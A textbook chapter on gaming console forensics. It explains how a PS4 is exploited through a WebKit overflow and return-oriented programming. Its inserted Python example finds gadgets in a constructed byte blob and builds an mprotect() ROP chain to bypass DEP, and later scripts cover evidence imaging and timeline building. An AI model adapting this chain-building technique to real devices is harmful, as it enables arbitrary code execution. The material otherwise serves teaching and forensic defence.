Chapter 8
Many gaming consoles, such as the Nintendo Wii, Xbox and PlayStation, have established
themselves in the market. Their basic architecture is similar to that of any computer: they
contain a hard drive, they run an operating system for their software, and they have
associated memory, so they store data in much the same way as a computer. Where a
console differs is in how closely its hardware and software are matched. The hardware
components are chosen to work well with each other, and the system software and the
games are optimized for that exact hardware, whereas PC software has to cover many
types and combinations of hardware.
Gaming consoles were invented for playing games, but they can also be used to watch
videos and movies and to browse the internet. The browsing history and the data about
games and movies are stored on the hard drive and can be retrieved using digital forensic
procedures. The Xbox and PlayStation use a von Neumann architecture: program and data
travel over the same bus to RAM, and RAM holds both instructions and data. Volatile
memory can therefore also provide important digital traces for the forensic process.
These consoles also allow games to be played online. For this a gamer needs an account;
an Xbox user, for example, must create an Xbox Live account to play online. This creates
another body of evidence for the digital forensics investigator.
Moreover, a computer and a gaming console can be used together as evidence. For
example, these systems can send an e-mail about a player's performance in a match once
a game is completed. Information like this may seem irrelevant, but it gives the
investigator data points and timestamps. These systems are therefore a valuable source of
evidence during the digital forensics process.
Despite the vital data they contain, very little academic research has been done on the
security of gaming consoles. Since today's consoles connect to the internet and can be
affected by zero-day vulnerabilities as well, it is important to devise a process that can
help retrace an attack and remove it.
Before setting out a procedure for performing digital forensics on these consoles, one
must know how their vulnerabilities are exploited and where digital forensics is needed to
detect the issue.
Exploiting Vulnerabilities on Consoles like PS4:
Attackers can compromise these systems in a few steps. The first thing an attacker does
is find out what software runs on the console. Take the PS4 as the target. The PS4 runs
on a custom AMD x86-64 CPU with 8 cores. This CPU architecture is very well
documented, with research papers available on the internet; even though the custom part
may differ a bit, the fundamental operations are the same. The PS4 runs the Orbis
Operating System (Orbis OS), which is based on FreeBSD 9.0. Even this information
about the console's OS is very important to the attacker, because the OS comes with
other open-source software. Particularly interesting is WebKit, the open-source layout
engine that the PS4 uses to render web pages in its browser. WebKit has documented
vulnerabilities that can be exploited. For example, CVE-2012-3748 is a heap-based buffer
overflow in the JSArray::sort(...) method. Exploiting it gives read and write access to
everything the WebKit process can read and write. That in turn can be used to overwrite
return addresses on the stack and take control of the instruction pointer register (rip).
The obvious next step would be to copy a payload into memory and point rip at it.
The PS4 kernel controls the properties of the different regions of memory. It enforces
Data Execution Prevention (DEP): pages of memory marked "executable" cannot be
written, and pages marked "writable" cannot be executed. So a payload cannot simply be
copied into memory and executed. What can be executed is code that is already loaded
into memory and marked "executable". To run logic of their own choosing under this
restriction, attackers turn to stack smashing, in particular Return-Oriented Programming
(ROP), where the overwritten stack holds a chain of memory addresses to which rip will
jump in sequence. The pieces of existing code at those addresses are called gadgets. A
gadget is a single desired instruction followed by a ret. In x86_64 assembly, when a ret
instruction is reached, a 64-bit value is popped off the stack and rip jumps to it. Since the
stack is now under the attacker's control, every ret can be made to jump to the next
gadget they want. For example, from 0x80000 contains instructions,
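The following is an added worked example, not code from the chapter or from any PS4 exploit: it scans a small executable region for ret-terminated gadgets and lays out the stack words of a ROP chain that would call mprotect() to turn a writable page executable, which is the usual way to get past DEP before jumping to a copied payload. The machine-code blob, the load address 0x80000 (the chapter's example address), the page and payload addresses, and the assumption that the executable region is at a known address (no ASLR) are all constructed for illustration; the chain is only built and printed, never executed, and real targets also restrict what mprotect will grant.

```python
"""Added example: find single-instruction gadgets ending in ret and build
an mprotect() ROP chain from them.  Nothing here is executed."""
import struct

# Constructed x86-64 machine code standing in for an executable region of
# the target process, annotated by offset.  Not real console code.
CODE = bytes([
    0x55,              # 0x00: push rbp
    0x48, 0x89, 0xe5,  # 0x01: mov rbp, rsp
    0x5f, 0xc3,        # 0x04: pop rdi ; ret      <- gadget
    0x90, 0x90,        # 0x06: nop ; nop
    0x5e, 0xc3,        # 0x08: pop rsi ; ret      <- gadget
    0x48, 0x31, 0xc0,  # 0x0a: xor rax, rax
    0x5a, 0xc3,        # 0x0d: pop rdx ; ret      <- gadget
    0x58, 0xc3,        # 0x0f: pop rax ; ret      <- gadget
    0x0f, 0x05, 0xc3,  # 0x11: syscall ; ret      <- gadget
    0xc3,              # 0x14: ret
])
BASE = 0x80000  # assumed address at which CODE is mapped

# Byte encodings of the gadgets we want: one instruction, then ret (0xc3).
GADGETS = {
    "pop rdi; ret": b"\x5f\xc3",
    "pop rsi; ret": b"\x5e\xc3",
    "pop rdx; ret": b"\x5a\xc3",
    "pop rax; ret": b"\x58\xc3",
    "syscall; ret": b"\x0f\x05\xc3",
}

SYS_MPROTECT = 74  # FreeBSD syscall number (Orbis OS is FreeBSD-based)
PROT_RWX = 0x7     # PROT_READ | PROT_WRITE | PROT_EXEC


def find_gadgets(code: bytes, base: int) -> dict:
    """Return {name: absolute address} for each gadget in `code`.
    Raises KeyError if any required gadget is missing."""
    found = {}
    for name, pattern in GADGETS.items():
        off = code.find(pattern)
        if off < 0:
            raise KeyError(f"gadget not found: {name}")
        found[name] = base + off
    return found


def build_mprotect_chain(gadgets: dict, page: int, length: int, payload: int) -> list:
    """Stack words that replace the saved return address.  Each ret pops the
    next word into rip; each pop gadget consumes the word that follows its
    own address as the register value."""
    return [
        gadgets["pop rdi; ret"], page,          # rdi = address of the page
        gadgets["pop rsi; ret"], length,        # rsi = length
        gadgets["pop rdx; ret"], PROT_RWX,      # rdx = new protection
        gadgets["pop rax; ret"], SYS_MPROTECT,  # rax = syscall number
        gadgets["syscall; ret"],                # mprotect(page, length, 7)
        payload,                                # final ret lands in the payload
    ]


def chain_bytes(chain: list) -> bytes:
    """Serialize the chain as little-endian 64-bit words, i.e. the bytes an
    overflow would write over the return address and the stack above it."""
    return b"".join(struct.pack("<Q", word) for word in chain)


if __name__ == "__main__":
    found = find_gadgets(CODE, BASE)
    for name, addr in found.items():
        print(f"{addr:#08x}  {name}")
    chain = build_mprotect_chain(found, page=0x200000, length=0x1000, payload=0x200000)
    print(chain_bytes(chain).hex())
```

The syscall gadget is deliberately followed by ret so that control returns to the chain; the last word is the payload address, which the final ret pops into rip once the page is executable.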
Modern game consoles are no longer exclusively for gaming; like any other computer they
offer many other functions, such as internet browsing, messaging, and video or movie
streaming. As they have become more advanced and powerful, they have also become
more exposed to external, internal and network attacks.
The next generation of gaming consoles is more advanced in terms of connectivity,
computing power and availability. As these systems have become more advanced and
powerful, and both their hardware and software have become more complex, many new
types of vulnerability have appeared. There are millions of users: the PlayStation 2 alone
sold over 100 million units.
Computer security has been an important research topic since the invention of the first
virus. It is equally important for console manufacturers to consider the security of these
systems as early as possible.
There are other concerns with gaming consoles too. Games are a means of entertainment
and fun, so from that perspective a gaming console is an advanced toy. Users sometimes
forget to protect their personal information while the system is connected to the internet,
and as a result they fall victim to attackers.
Video games have been around for quite a long time and are the basic idea behind the
design of any gaming console. The first such game was invented at the end of the 1940s,
and the field has evolved many times since. Although games are for entertainment,
connecting to them has dark sides too. One important downside is cheating, which
undermines sportsmanship and morale.
Need of Gaming Console Forensics:
The question arises: why do we need gaming console forensics? The answer lies in the
fact that every digital object is in some way exposed to security attacks, and a criminal
investigation may need to perform forensic analysis of every device connected to the
network on which the gaming console operates. This is a cumbersome job. The growth in
the number of gaming consoles and in the number of cyber-attacks gives rise to a new
branch of forensics: gaming console forensics. It is more complex and multifaceted than
the traditional frameworks for computer forensics or network forensics.
These consoles face many security challenges and require object-driven models to avoid
exploitation; similarly, for the post-mortem of any digital event, we need object-driven
forensic frameworks. Gaming console forensics, then, deals with the investigation of
cybercrimes committed on or through these systems. It includes the preservation and
analysis of sensor data, of data stored on all the platforms connected over the network,
and of data held in cloud storage.
Gaming console forensics is an amalgamation of different types of digital forensics,
including cloud forensics, network forensics and computer forensics. The Random Access
Memory (RAM) in such devices is limited, and the devices try to forward data as soon as
possible; the data is usually transferred over the network in encrypted form and
processed in a cloud environment located elsewhere. This makes gaming console
forensics a challenging task.
Digital forensics is a process that can help detect any breach or security issue on a
device. Since gaming consoles are exposed to attacks and breaches, digital forensics is
important for documenting any incident. Before starting the digital forensics process on
a gaming console, one must have a firm grasp of computer, network and cloud forensics.
1. Computer Forensics:
Computer forensics is the art of collecting evidence in a form that can be presented to
a third party and is admissible in a court of law: a series of techniques and procedures
for gathering evidence from computing equipment and other digital media and
presenting it in a meaningful format. It covers the preservation, identification,
extraction, interpretation and documentation of computer evidence, including the
rules of evidence, legal processes, the integrity of evidence, reporting of findings, and
the provision of expert opinion in a court of law or other legal proceedings. This is
achieved in the following manner:
a. Preserving the crime scene
b. Tagging the evidence
c. Filling in digital evidence forms
d. Maintaining the chain of custody
e. Evidence handling
f. Restricting access on a need-to-know basis
g. Forensically sound acquisition
h. Preserving the original evidence
i. Analyzing the evidence
j. Presenting the evidence
2. Network Forensics:
Network forensics plays a crucial role in an organization's incident response process
and post-incident investigation. When a security incident is detected, the incident
response process is initiated and the affected organization seeks to determine the
extent of the incident and its potential impact. "How did it happen?" is another
question that must be answered. Since attackers interact with the organization's
network when launching their attacks, logs from network devices can help determine
the type of attack and track the steps the attacker took. In certain cases, data
gathered during these steps may need to be presented as evidence before a regulatory
authority or a court.
3. Cloud Forensics:
Gaming consoles are sometimes connected to a cloud service, because their local
memory is limited and they need to move data to a safe place as soon as possible. Cloud
services also process the data. Cloud forensics investigates the data held in the cloud
when an attack occurs.
Although tools from computer and network forensics can be used to perform digital
forensics on gaming consoles, there is a growing need for specialized tools that can
report data directly from consoles such as the Xbox, as console designs keep advancing.
Three sources of evidence must be considered.
1. Console:
Considering the Xbox alone, its increasing complexity gives hackers and other criminals
many opportunities to exploit the ever-growing vulnerabilities and risk factors. A lot of
data is stored in the RAM and on the hard drive of a console, and it is likewise
vulnerable.
The problem is that when law enforcement agencies collect evidence, they usually
overlook the gaming console as an important source. In recent years, however, law
enforcement has recognised the potential of gaming consoles, and they are becoming a
good source of evidence.
The XFT device allows forensic teams to retrieve hidden data from a console hard drive
that might previously have gone unnoticed. Both hardware and software can be analyzed
with it, which opens a new door for investigation teams.
2. Network:
The second important source of evidence in gaming console forensics is the network.
Network analysis can also reveal a great deal about the crime scene.
3. Cloud:
Thirdly, the cloud can be a source of evidence. The cloud is an on-demand, scalable,
virtualized computing system. Since console data is mostly transferred to a cloud, we
also need to acquire data from the cloud.
The most technical job in any forensic process is evidence extraction. As discussed
above, there cannot be a single extraction method for gaming console forensics, because
consoles differ in design, OS, features and connections. Hence, to date there is no single
standard framework for gaming console forensics, especially for the extraction
procedure.
The following steps can help extract evidence from any type of gaming console,
irrespective of manufacturer, version or OS.
1. Intake
The first step is the intake of the evidence. The documentation and paperwork are
done in this phase. Seizure of the gaming console must be performed with great care to
avoid any alteration or loss of data.
2. Identification
The identification stage establishes the broad facts about the gaming console. This
includes the legal authority, the purpose of the forensic examination, the make and
model of the console, any external or removable storage, and any other potential
evidence.
3. Preparation
After identification, thorough research must be done on the identified make and
model of the gaming console to decide which tools and methods can help with data
acquisition and data analysis.
4. Processing
The next step is the acquisition itself. The most feasible approach is physical
acquisition, which extracts the raw data and can be performed with the console
powered off. Other acquisition methods, such as logical and filesystem acquisition,
can be used if physical acquisition fails to provide the required output.
5. Verification
The investigator then needs to verify the integrity of the extracted data. For this, hash
values are calculated for the acquired image and for the original console storage and
compared; matching hashes show that the copy is complete and the original unaltered.
6. Documentation
The next step is to create a report of the whole evidence extraction process. The report
must include the method, the aim of the extraction, the make and build of the gaming
console, the acquisition tools used, and so on.
7. Presentation
The findings of the forensic phase must be documented so that the results are clear
and concise and the process is repeatable.
8. Archiving
The last step of evidence extraction is archiving. The evidence must be preserved in a
way that keeps the data intact throughout the court proceedings and available for
future reference.
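As an added example of the processing, verification and documentation steps above (this is illustrative code written for this chapter, not a tool from the original text or from any vendor), the script below performs a bit-for-bit copy of a storage device into an image file, hashes the source before and after acquisition and the image afterwards, and records the result. The "device" is a constructed byte string written to a temporary file; the case identifier, device description and file names are assumed. In practice the source would be the console drive attached through a write blocker, and the same check, source hash unchanged and image hash equal to it, is what step 5 requires.

```python
"""Added example: physical acquisition into an image file with hash-based
verification and a JSON-serialisable acquisition record."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 4096  # read size; hashing in chunks handles images larger than RAM


def hash_file(path: str) -> dict:
    """MD5 and SHA-256 of a file.  MD5 is reported because many evidence
    forms still ask for it; the verification decision uses SHA-256."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            md5.update(block)
            sha256.update(block)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}


def acquire(source: str, image: str) -> dict:
    """Copy the source bit-for-bit into `image`, then hash both."""
    with open(source, "rb") as src, open(image, "wb") as dst:
        for block in iter(lambda: src.read(CHUNK), b""):
            dst.write(block)
    return {"source": hash_file(source), "image": hash_file(image)}


def verify(hashes: dict, source_before: dict) -> bool:
    """Step 5: the image must match the source, and the source must still
    match the hash taken before acquisition (the original was not altered)."""
    return (hashes["image"]["sha256"] == hashes["source"]["sha256"]
            and hashes["source"]["sha256"] == source_before["sha256"])


def acquisition_record(case_id: str, device: str, source: str, image: str) -> dict:
    """Step 6: document what was done, with the hashes and the verdict."""
    before = hash_file(source)
    hashes = acquire(source, image)
    return {
        "case_id": case_id,
        "device": device,
        "image_file": os.path.basename(image),
        "acquired_at_utc": datetime.now(timezone.utc).isoformat(),
        "source_hash_before": before,
        "hashes": hashes,
        "verified": verify(hashes, before),
    }


# Constructed stand-in for the contents of a console drive; not real data.
SAMPLE_DEVICE = b"SAMPLE-CONSOLE-HDD" + bytes(range(256)) * 40 + b"\x00" * 777


def run_demo() -> dict:
    """Acquire the constructed device and verify; then flip one byte in the
    image and verify again to show that a damaged copy is rejected."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "console_hdd.bin")
        img = os.path.join(d, "console_hdd.dd")
        with open(src, "wb") as f:
            f.write(SAMPLE_DEVICE)
        rec = acquisition_record("CASE-0001", "console internal HDD (assumed)", src, img)
        with open(img, "r+b") as f:   # simulate a corrupted image
            f.seek(5)
            f.write(b"X")
        rec["verified_after_tamper"] = verify(
            {"source": rec["hashes"]["source"], "image": hash_file(img)},
            rec["source_hash_before"])
    return rec


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Hashing the source a second time after the copy is what distinguishes a forensically sound acquisition from a plain copy: it proves the original evidence was not written to while the image was being made.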
Digital evidence collection requires data acquisition tools. Since no single tool covers
complete gaming console analysis, tools from computer, network and device forensics help
acquire the data. Table 8.1 lists some data acquisition tools that can be useful in the
gaming console forensics process.
Table 8.1: Data acquisition tools used in gaming console forensics (free and commercial)

Memory acquisition tool      Description
AccessData FTK Imager        A data preview and imaging tool that lets you quickly assess
                             electronic evidence to determine whether further analysis with
                             a forensic tool such as Forensic Toolkit (FTK) is warranted.
DumpIt                       Windows tool for dumping RAM for analysis.
Magnet AXIOM                 A complete digital investigation platform that allows examiners
                             to acquire and analyze forensic data and share their findings.
Belkasoft Live RAM Capturer  A small free forensic tool that reliably extracts the entire
                             contents of a computer's volatile memory.
The general forensic process involves data acquisition, preservation, data analysis and
reporting. Digital forensics of gaming consoles is a sophisticated procedure that has not
yet been studied by many researchers.
The process involves following steps:
1. Data Acquisition:
Data acquisition is the most important step of the forensic process. For gaming console
forensics, this step begins with determining details of the console, such as its model and
firmware version. The sources of evidence are then determined, the acquisition tools are
set up, and acquisition is performed. The acquired data is preserved for further use.
2. Data Analysis:
The core step of any forensic process is data analysis. It begins with setting up the
analysis tools. The investigator then filters out the data segments and events that are
relevant, builds a timeline, and reconstructs the event. The results are documented for
reporting.
3. Documentation:
In this step the reports from the forensic readiness, data acquisition and data analysis
steps are collected. A final report containing all the analysis and results is created for
presentation in court or to any other authorised body.
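The timeline building described under data analysis, as an added example written for this chapter rather than taken from it: records from three evidence sources (the console's browser history in the console's local time, an online account sign-in log in UTC, and the home router's connection log in Unix epoch seconds) are normalised to UTC, merged into one ordered timeline, and filtered to a window of interest. Every log line and field layout is constructed for illustration; they are not the real formats of any console, service or router, and the console time zone (UTC+5) is an assumption.

```python
"""Added example: merge events from several sources with different
timestamp conventions into a single UTC timeline and filter it."""
import json
from datetime import datetime, timedelta, timezone
from typing import List, NamedTuple

# Assumed console clock setting; in a real case take it from the device.
CONSOLE_TZ = timezone(timedelta(hours=5))

# Constructed records (not real data).
BROWSER_HISTORY = [  # console local time | url | title
    "2023-03-14 21:02:11|https://example.test/forum/thread/88|Forum thread",
    "2023-03-14 21:05:47|https://example.test/download/tool.zip|Download",
]
ACCOUNT_LOG = [      # JSON lines, ISO-8601 UTC
    '{"ts":"2023-03-14T15:58:30Z","event":"sign_in","account":"player01","ip":"203.0.113.7"}',
    '{"ts":"2023-03-14T16:40:02Z","event":"game_result_mail","account":"player01"}',
]
ROUTER_LOG = [       # epoch seconds, direction, flow
    "1678809600 OUT 192.168.1.23:49211 -> 198.51.100.9:443",
    "1678809900 OUT 192.168.1.23:49300 -> 203.0.113.50:8080",
]


class Event(NamedTuple):
    when: datetime   # always timezone-aware UTC
    source: str
    detail: str


def parse_browser(line: str) -> Event:
    ts, url, title = line.split("|", 2)
    local = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=CONSOLE_TZ)
    return Event(local.astimezone(timezone.utc), "console_browser", f"{title}: {url}")


def parse_account(line: str) -> Event:
    rec = json.loads(line)
    when = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    extra = {k: v for k, v in rec.items() if k != "ts"}
    return Event(when, "account", json.dumps(extra, sort_keys=True))


def parse_router(line: str) -> Event:
    epoch, rest = line.split(" ", 1)
    return Event(datetime.fromtimestamp(int(epoch), tz=timezone.utc), "router", rest)


def build_timeline() -> List[Event]:
    """Parse every source, then sort on the normalised UTC timestamp."""
    events = [parse_browser(l) for l in BROWSER_HISTORY]
    events += [parse_account(l) for l in ACCOUNT_LOG]
    events += [parse_router(l) for l in ROUTER_LOG]
    return sorted(events, key=lambda e: e.when)


def filter_window(events: List[Event], start_utc: str, end_utc: str) -> List[Event]:
    """Keep events with start <= when < end; bounds are naive ISO strings
    interpreted as UTC."""
    start = datetime.fromisoformat(start_utc).replace(tzinfo=timezone.utc)
    end = datetime.fromisoformat(end_utc).replace(tzinfo=timezone.utc)
    return [e for e in events if start <= e.when < end]


if __name__ == "__main__":
    timeline = build_timeline()
    for e in filter_window(timeline, "2023-03-14T16:00:00", "2023-03-14T16:10:00"):
        print(e.when.isoformat(), e.source, e.detail)
```

Normalising to UTC before sorting is the step most often skipped; without it the console's local-time browser entries would appear five hours after the router flows they actually caused.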